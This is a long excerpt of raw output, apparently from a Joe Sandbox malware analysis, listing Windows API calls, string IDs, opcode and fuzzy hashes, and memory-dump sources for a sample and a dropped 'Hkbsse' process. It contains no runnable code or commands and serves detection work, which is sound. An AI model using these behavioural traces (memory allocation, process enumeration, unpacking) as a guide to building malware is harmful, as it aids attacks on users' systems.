                    • Instruction Fuzzy Hash: EE110636A00214ABCB19BF19C48596E7765AF4C365F14406BEC02A73A2DB7CDD05CBDD
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 3109751735-3974838576
                    • Opcode ID: 8e0d3a27dc6f9ee6324be1a1e4ea56dee360a7d060283af5dc5f599027f37d14
                    • Instruction ID: c76681e0b964bcace0b93bbe14680470d23c52cf74b0c73484cba7b613844c7a
                    • Opcode Fuzzy Hash: 8e0d3a27dc6f9ee6324be1a1e4ea56dee360a7d060283af5dc5f599027f37d14
                    • Instruction Fuzzy Hash: EE01C875C0030D77CB14AEA5EC0598A77AC9E04319F10862BBA14A6591FB78EA98C699
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041D32A
                    • ___raise_securityfailure.LIBCMT ref: 0041D411
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: @WF
                    • API String ID: 3761405300-3852368868
                    • Opcode ID: 460afabb6922fb4f296bbee52beaac180ae284aceef47d3ebe08e74322d503a1
                    • Instruction ID: 75ee518bf79167b8f649b50e41bdf5ed7c56c8c6d5508b330e436f80bcac97d4
                    • Opcode Fuzzy Hash: 460afabb6922fb4f296bbee52beaac180ae284aceef47d3ebe08e74322d503a1
                    • Instruction Fuzzy Hash: D321DFB4510B00EAD720EF55EA856543BE4FB58314F50513AEA088BAB1F3F458A5CF8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock
                    • String ID: P#@$P#@
                    • API String ID: 1418687624-3974838576
                    • Opcode ID: c4ac876da92ca31e90b15d523be836fc0012c066dc5059b4bef913fc19992d03
                    • Instruction ID: d675d88b1282bf066b476e3553b00fe0255c5d2f2a02dd3f05bed3fb85d18cc6
                    • Opcode Fuzzy Hash: c4ac876da92ca31e90b15d523be836fc0012c066dc5059b4bef913fc19992d03
                    • Instruction Fuzzy Hash: 1E0128356003086BC714FF95D801E9B7B9D9F04719B00457FFA05B7642EFB8AA4487AD
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: x!F
                    • API String ID: 269201875-3062043068
                    • Opcode ID: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction ID: 56fa3789027995a5aecf10054e030550e23fafb08513044789175fa23ab53285
                    • Opcode Fuzzy Hash: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction Fuzzy Hash: FF018835E45E21FAFD3176B6AE04E6B1288DF42724B140327EF28B51E5E951F80A4296
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: x!F
                    • API String ID: 269201875-3062043068
                    • Opcode ID: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction ID: d85ed182e3a527026958e8772241ee3510a0413970d01727080480170c1ae8b7
                    • Opcode Fuzzy Hash: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction Fuzzy Hash: 00015231985A2176E52932365D46B6B12489B1D768F14222BFBB0A62E2FB5D8C2301DF
                    APIs
                    • RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 044F3ED9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID: @E$@E
                    • API String ID: 3997070919-1681324763
                    • Opcode ID: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction ID: 4a6a5b1e3d2db2c94de492d042a1021d32cc26f03b61da241b2ed31d2cf8425a
                    • Opcode Fuzzy Hash: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction Fuzzy Hash: 87016235900209ABDB019F6CD984FAEBBB8FF48755F15419AEE05AB3A1D770E901CBD0
                    APIs
                    • RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID: @E$@E
                    • API String ID: 3997070919-1681324763
                    • Opcode ID: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction ID: ccb3f3f5f7c9ee04892ce8e489ef89d1f636ac3599413e13066f302f7a6b8dbe
                    • Opcode Fuzzy Hash: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction Fuzzy Hash: 1E01A236900208AFD7019F5DD884BAEBBB8FF48701F15915AE904AB3A1D770EE01CF90
                    APIs
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00419B6B
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00419B74
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: {A
                    • API String ID: 1432671424-169627337
                    • Opcode ID: 1e5744975acad0febd2726890940471a240838eee3624bc293d6c265ef5c91b6
                    • Instruction ID: e068e03794c4fb8f333e278d6eb3df2bafc1dd7495d534287246863c21af4ae8
                    • Opcode Fuzzy Hash: 1e5744975acad0febd2726890940471a240838eee3624bc293d6c265ef5c91b6
                    • Instruction Fuzzy Hash: 05F04FB29047009BCA24DB61E459BDB73E8BF44304F04491EE69687A41D778F988C795
                    APIs
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 3109751735-3974838576
                    • Opcode ID: 92b96a2490baaecf7b1badda44f20d14ef1af3c9e2e21dd8a15b500e5daaabdc
                    • Instruction ID: 63b28b545846f2e16aeef958533034f84efa6074d6cfadea166291daee7e4e7d
                    • Opcode Fuzzy Hash: 92b96a2490baaecf7b1badda44f20d14ef1af3c9e2e21dd8a15b500e5daaabdc
                    • Instruction Fuzzy Hash: 6EF0A0B680020C67C714EEE5D801986B7ACDE19305F108A2BFB50A7501F7B4BA488799
                    APIs
                      • Part of subcall function 00402AF0: ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040343E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy$ExceptionRaise
                    • String ID: P#@$P#@
                    • API String ID: 2103344913-3974838576
                    • Opcode ID: 044c6c93a0eada27c9aacc806972e27047ed6f520bcb21169c284d2a50876cae
                    • Instruction ID: 59601a4cc39f227afb39c20c06a9e1ce7c679964eee42f0a4464548f58adb70b
                    • Opcode Fuzzy Hash: 044c6c93a0eada27c9aacc806972e27047ed6f520bcb21169c284d2a50876cae
                    • Instruction Fuzzy Hash: A2F0EC76D1020C67C714EFD9DC01D87B7ACDE04305B10892BFA10B7502FBB4B54487A9
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00417C66
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00417C6F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    • Opcode ID: 4e413a3fa84508e26811ec96a5c5c29d0cbdfa0ef1a719351920035e4ed366a0
                    • Instruction ID: abed85cd935592136217e6f665b32487889cb1eb46ec7d36a7aebd99e62de6e6
                    • Opcode Fuzzy Hash: 4e413a3fa84508e26811ec96a5c5c29d0cbdfa0ef1a719351920035e4ed366a0
                    • Instruction Fuzzy Hash: 9CF0E970A4130957C7209B64CC45A86B7D89F01319B14862FF95887291E779E8848BD8
                    APIs
                    • GetOEMCP.KERNEL32(00000000,0043E56E,?,?,0043768E,0043768E,?), ref: 0043E327
                    • GetACP.KERNEL32(00000000,0043E56E,?,?,0043768E,0043768E,?), ref: 0043E33E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: nC
                    • API String ID: 0-511710893
                    • Opcode ID: ae1174e1bc1fa5c5b9ea938702fdb7f5fe2436d67eb7aadae447a038ed29db40
                    • Instruction ID: 21ada401c65e344d19c9832113dec9a351789fdaec7677b80bc96e6f92cc92e3
                    • Opcode Fuzzy Hash: ae1174e1bc1fa5c5b9ea938702fdb7f5fe2436d67eb7aadae447a038ed29db40
                    • Instruction Fuzzy Hash: 42F0C230509200CBDB10EB65E85876D37B0AB04339F244355E835972E2D3B49845CB4A
                    APIs
                    • RtlEnterCriticalSection.NTDLL(00465720), ref: 044DD493
                    • RtlLeaveCriticalSection.NTDLL(00465720), ref: 044DD4D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: WF
                    • API String ID: 3168844106-2907287748
                    • Opcode ID: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
                    • Instruction ID: 2dd65675b3980060ba96108ec9db94281b36c90d08ccfb177768e1e3ac462e0d
                    • Opcode Fuzzy Hash: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
                    • Instruction Fuzzy Hash: DDF02734A00A00DFCB209F18DD64A2677A8EB8673AF10033FEA55473D0E7343842CA16
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402552
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    • Opcode ID: 2fa3110b15e4ed6c98d5a9cc667e066133f73a9b9ffec81c69659b02797e5efb
                    • Instruction ID: eb727e4c6e3963252b4e60716a57e365d02bcbec5f304e335dc0a3bb04f943e9
                    • Opcode Fuzzy Hash: 2fa3110b15e4ed6c98d5a9cc667e066133f73a9b9ffec81c69659b02797e5efb
                    • Instruction Fuzzy Hash: A1F08271D1020CABC714DF68D84198EBBF4AF59304F1082AFE844A7201EBB56A98CB99
                    APIs
                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042BA5E
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042BA71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 548886458-2046700901
                    • Opcode ID: ebba513cb9f63eb931d06b0caf41921b684af7cd7b87baaac4c1ea1afcc669e4
                    • Instruction ID: 293f1ce4af30ee7a2289b2cafc5ba0a963c10326eaee9af88c8a7d0fff09a4de
                    • Opcode Fuzzy Hash: ebba513cb9f63eb931d06b0caf41921b684af7cd7b87baaac4c1ea1afcc669e4
                    • Instruction Fuzzy Hash: C9E0613EB4021467CB04B765E809C5DB77D9EC4714B10002BFA11A3362DF78DE44C5D8
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00402E50
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00402E59
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    • Opcode ID: 952c4a973a76709c9192fc1bc0ced5762ba26b9c2c78b9249b3edbe7acbbfe24
                    • Instruction ID: 46641368e6e60d11f9b06d4282c7db89a0e812e8be57c8d216f63cbc4c5833f8
                    • Opcode Fuzzy Hash: 952c4a973a76709c9192fc1bc0ced5762ba26b9c2c78b9249b3edbe7acbbfe24
                    • Instruction Fuzzy Hash: 0FE020B284130427C311AA909C0AEC77BCC8F11305F00482FFD5452242E7F9958447D8
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044E266C
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 044E2682
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 044E2BB8
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 044E2BCC
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 044E2BED
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044E2C56
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044E2DC4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
                    • String ID: @[F
                    • API String ID: 3302332639-1227568360
                    • Opcode ID: 153f3236cdbabbe7db1991ef0cf1f88b6a31994afc8e27e540a562292e0a9b1f
                    • Instruction ID: d29f8838d596b8ebed72195260df4abbbc2c0c67dead05adfcaa3386e5a64fb9
                    • Opcode Fuzzy Hash: 153f3236cdbabbe7db1991ef0cf1f88b6a31994afc8e27e540a562292e0a9b1f
                    • Instruction Fuzzy Hash: 3EE012B0B00601DBEF24AFA7D954735736CBB4470AF40056FD1448E241E7F5F8004749
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042360C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pScheduler$version
                    • API String ID: 2141394445-3154422776
                    • Opcode ID: 1b8a5219dacf47ec03d32c1aec8fefea155487b99710d83f1d7aad74c904c1a2
                    • Instruction ID: 5982c27aeec872d2574ee75d90a85c5a0ba858edd689f383aa7f969d4c346686
                    • Opcode Fuzzy Hash: 1b8a5219dacf47ec03d32c1aec8fefea155487b99710d83f1d7aad74c904c1a2
                    • Instruction Fuzzy Hash: 16E0483464021876CB25BE55D807BC97778972034AF508017B911211A29BFC57CCD989
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 004024BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    • Opcode ID: 3730dae516e2db0038084a6e01249f6a9c5f8554e197c263b70ab42fed9b62c6
                    • Instruction ID: acdab43ea0f454e5b568466deb4dea61ad9a442cdd38150ed4eca4c6d96c7cd7
                    • Opcode Fuzzy Hash: 3730dae516e2db0038084a6e01249f6a9c5f8554e197c263b70ab42fed9b62c6
                    • Instruction Fuzzy Hash: 71D0C2B2910308A7C200DF98C800842BBDC9E19315700C52BF944E7201F3B0E8848BA8
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040259E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    • Opcode ID: 3e913364fa5ea32c817d1b94c44d2086dc151819d2061fcb1bc8fdb026396fa3
                    • Instruction ID: 36b4a820664289b2779fabdb349dd3e31dd3f8a7d41fa5f4faa77770d1d2b202
                    • Opcode Fuzzy Hash: 3e913364fa5ea32c817d1b94c44d2086dc151819d2061fcb1bc8fdb026396fa3
                    • Instruction Fuzzy Hash: 41D02BB291030857C710DF98CC00842B7DCDE19315700C92BF944E7201F3B0E894CBE8
                    APIs
                    • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 00430CFA
                      • Part of subcall function 0042D9C0: Concurrency::details::ContextBase::~ContextBase.LIBCMT ref: 0042D9F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$BaseBase::~Concurrency::details::Internal
                    • String ID: B$B
                    • API String ID: 1065816584-1850355789
                    • Opcode ID: 5fc58df1e84948ee6e121ba395f9e2b525534bd4c2c1d5557bd544cbab0759a5
                    • Instruction ID: d343d55d842dc0c5f7550b210159b9d4af8cf7a514022aa9f7c69f9350428cd9
                    • Opcode Fuzzy Hash: 5fc58df1e84948ee6e121ba395f9e2b525534bd4c2c1d5557bd544cbab0759a5
                    • Instruction Fuzzy Hash: 0ED0A5B214431515C3141ED9750679577C84F06755F14C05FFD5857283DFF9548442DD
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00402E1D
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00402E26
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    • Opcode ID: efb077dd9d90d760ce7937592e4120b290c0c6b94cc5addc2e5bc00b41a1a09e
                    • Instruction ID: d60a9d71acd9a2374f3681a4d886ad7491f8954107def6b53710e47b223ef30e
                    • Opcode Fuzzy Hash: efb077dd9d90d760ce7937592e4120b290c0c6b94cc5addc2e5bc00b41a1a09e
                    • Instruction Fuzzy Hash: C4D012BAC423155BC721EF90A9458C777DCAE053153504D1FE89593611E7B8A9C88F94

                    Execution Graph

                    Execution Coverage:0.5%
                    Dynamic/Decrypted Code Coverage:26.9%
                    Signature Coverage:0%
                    Total number of Nodes:104
                    Total number of Limit Nodes:5
                    APIs
                      • Part of subcall function 00408B00: GetTempPathA.KERNEL32(00000104,?,13877BC0,?,00000000), ref: 00408B47
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00409A43
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFilePathTemp
                    • String ID:
                    • API String ID: 3199926297-0
                    • Opcode ID: decc8cf0d00bb9ec58cee1965f8fe2dc42d49a477c0570b2cb11aad4758c2aca
                    • Instruction ID: 300cc23dac7bbdec6802486b90ae88e6198841c70d610ab3b66933c1455241e6
                    • Opcode Fuzzy Hash: decc8cf0d00bb9ec58cee1965f8fe2dc42d49a477c0570b2cb11aad4758c2aca
                    • Instruction Fuzzy Hash: E342E370D00248DBEF14EBB8C6497DE7BB1AF06314F24426AD411773C2D7BD5A848BAA

                    Control-flow Graph
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,0043663A,?,?,?,?,?,0043768E), ref: 0043665D
                    • TerminateProcess.KERNEL32(00000000,?,0043663A,?,?,?,?,?,0043768E), ref: 00436664
                    • ExitProcess.KERNEL32 ref: 00436676
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction ID: f65fa2cbf11c9341c6ec27041228dabd0dafc272b041e2f68e728e25dfebead6
                    • Opcode Fuzzy Hash: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction Fuzzy Hash: 54E08C31000608BFCF112F55DD0EE493B28FF08786F058425F80586232CB3ADC92CB89

                    Control-flow Graph
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0448024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 5f61ef1290bde1b3aee04fed750c5f028482ebd01521e68fed38d8823c5a3cb3
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: EC527A74A11229DFDB64CF58C984BADBBB1BF09304F1580DAE50DAB351DB30AA89DF14

                    Control-flow Graph
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 0-537541572
                    • Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction ID: 21de61e756f92fc94f430986694573f373faed14fbe57d2d8d79661cf7d5140c
                    • Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction Fuzzy Hash: D721D735A01714ABCB228A659C49B2F3754DF09760F2413A2FE05A73A1D738ED0086DD

                    Control-flow Graph
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02892246
                    • Module32First.KERNEL32(00000000,00000224), ref: 02892266
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, Offset: 02891000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_2891000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
